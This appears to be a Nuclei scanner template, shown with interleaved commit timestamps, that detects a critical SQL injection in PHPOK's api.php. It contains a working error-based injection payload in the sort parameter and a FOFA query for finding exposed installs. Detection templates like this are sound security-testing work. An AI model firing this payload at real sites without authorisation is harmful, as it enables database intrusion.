2022-06-05 08:31:28 +00:00
id : phpok-sqli
info :
2022-09-29 13:38:41 +00:00
name : PHPOK - SQL Injection
2022-06-05 08:31:28 +00:00
author : ritikchaddha
2022-09-29 13:38:41 +00:00
severity : critical
description : PHPOK contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference :
- https://cve.report/software/phpok/phpok
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score : 10
2022-09-29 13:38:41 +00:00
cwe-id : CWE-89
2022-06-05 08:31:28 +00:00
metadata :
2022-06-30 03:02:35 +00:00
verified : true
2023-10-14 11:27:55 +00:00
max-request : 1
2022-06-05 08:36:26 +00:00
fofa-query : app="phpok"
2022-06-05 08:31:28 +00:00
tags : phpok,sqli
2022-06-30 03:01:16 +00:00
variables :
num : "999999999"
2023-04-27 04:28:59 +00:00
http :
2022-06-05 08:31:28 +00:00
- method : GET
path :
2022-06-30 03:01:16 +00:00
- '{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+'
2022-06-05 08:31:28 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-06-30 03:01:16 +00:00
- '{{md5({{num}})}}'
2023-10-20 11:41:13 +00:00
# digest: 4a0a004730450221008706b8e9dfd9f98c14912e506c142d89e37505f8f0983edadfe0f67c3bfc180002207f3eb9b342194f65566cc148964ffe559da9914aa63ed4f3a9578aa52c2f4165:922c64590222798bb761d5b6d8e72950